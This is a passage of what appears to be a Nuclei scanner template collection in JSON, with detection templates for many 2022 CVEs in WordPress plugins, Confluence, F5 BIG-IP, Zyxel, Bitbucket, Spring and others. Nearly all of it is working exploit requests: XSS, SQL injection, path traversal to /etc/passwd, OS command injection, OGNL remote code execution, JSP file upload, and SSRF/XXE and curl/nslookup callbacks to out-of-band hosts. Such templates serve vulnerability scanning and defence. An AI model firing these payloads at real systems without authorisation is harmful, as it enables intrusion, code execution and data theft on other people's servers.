{{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24288","info":{"name":"Apache Airflow OS Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command","{{BaseURL}}/code?dag_id=example_passing_params_via_test_command"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["foo was passed in via Airflow CLI Test command with value {{ params.foo }}"]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31983","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: 